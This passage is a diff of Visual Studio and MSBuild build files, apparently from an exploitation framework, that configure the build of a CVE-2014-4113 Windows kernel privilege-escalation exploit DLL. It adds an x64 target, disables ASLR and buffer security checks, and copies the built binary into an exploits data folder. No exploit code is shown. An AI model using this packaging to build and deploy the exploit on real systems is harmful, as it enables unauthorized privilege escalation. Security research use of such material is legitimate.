<FunctionLevelLinking>true</FunctionLevelLinking>
|
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
<CompileAs>Default</CompileAs>
|
<StringPooling>true</StringPooling>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||||
|
<PrecompiledHeader>
|
||||||
|
</PrecompiledHeader>
|
||||||
|
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
|
||||||
|
<ObjectFileName>$(OutDir)\</ObjectFileName>
|
||||||
|
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
|
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
|
<TreatWarningAsError>true</TreatWarningAsError>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
|
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||||
|
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
|
||||||
|
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
|
||||||
|
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
|
||||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||||
<OptimizeReferences>true</OptimizeReferences>
|
<GenerateMapFile>true</GenerateMapFile>
|
||||||
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
|
<MapFileName>$(OutDir)\cve-2014-4113.map</MapFileName>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<OptimizeReferences>
|
||||||
|
</OptimizeReferences>
|
||||||
|
<EnableCOMDATFolding>
|
||||||
|
</EnableCOMDATFolding>
|
||||||
|
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||||
|
<DataExecutionPrevention>
|
||||||
|
</DataExecutionPrevention>
|
||||||
|
<ImportLibrary>$(OutDir)\cve-2014-4113.lib</ImportLibrary>
|
||||||
|
<Profile>false</Profile>
|
||||||
|
<ModuleDefinitionFile>
|
||||||
|
</ModuleDefinitionFile>
|
||||||
|
<AdditionalOptions>/ignore:4070</AdditionalOptions>
|
||||||
</Link>
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.01 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
IF EXIST "..\..\..\..\..\data\exploits\CVE-2014-4113\" GOTO COPY
|
||||||
|
mkdir "..\..\..\..\..\data\exploits\CVE-2014-4113\"
|
||||||
|
:COPY
|
||||||
|
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2014-4113\"</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemGroup>
|
<ItemGroup>
|
||||||
<ClCompile Include="cve-2014-4113.c" />
|
<ClCompile Include="cve-2014-4113.c" />
|
||||||
</ItemGroup>
|
</ItemGroup>
|
||||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||||
<ImportGroup Label="ExtensionTargets">
|
<ImportGroup Label="ExtensionTargets">
|
||||||
|
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
|
||||||
</ImportGroup>
|
</ImportGroup>
|
||||||
</Project>
|
</Project>
|
|
@ -4,14 +4,15 @@
|
||||||
<SolutionPath>.\cve-2014-4113.sln</SolutionPath>
|
<SolutionPath>.\cve-2014-4113.sln</SolutionPath>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
|
|
||||||
<Target Name="all" DependsOnTargets="x86" />
|
<Target Name="all" DependsOnTargets="x86;x64" />
|
||||||
|
|
||||||
<Target Name="x86">
|
<Target Name="x86">
|
||||||
<Message Text="Building CVE-2014-4113 win32k_null_page x86 Release version" />
|
<Message Text="Building CVE-2014-4113 track_popup_menu x86 Release version" />
|
||||||
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
|
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
|
||||||
</Target>
|
</Target>
|
||||||
|
|
||||||
<Target Name="x64">
|
<Target Name="x64">
|
||||||
<Message Text="CVE-2014-4113 is not supported in x64" />
|
<Message Text="Building CVE-2014-4113 track_popup_menu x64 Release version" />
|
||||||
|
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
|
||||||
</Target>
|
</Target>
|
||||||
</Project>
|
</Project>
|
||||||
|
|
|
@ -48,7 +48,7 @@ IF "%ERRORLEVEL%"=="0" (
|
||||||
)
|
)
|
||||||
|
|
||||||
IF "%ERRORLEVEL%"=="0" (
|
IF "%ERRORLEVEL%"=="0" (
|
||||||
ECHO "Building CVE-2014-4113 (win32k_null_page)"
|
ECHO "Building CVE-2014-4113 (track_popup_menu)"
|
||||||
PUSHD CVE-2014-4113
|
PUSHD CVE-2014-4113
|
||||||
msbuild.exe make.msbuild /target:%PLAT%
|
msbuild.exe make.msbuild /target:%PLAT%
|
||||||
POPD
|
POPD
|
||||||
|
|
Loading…
Reference in New Issue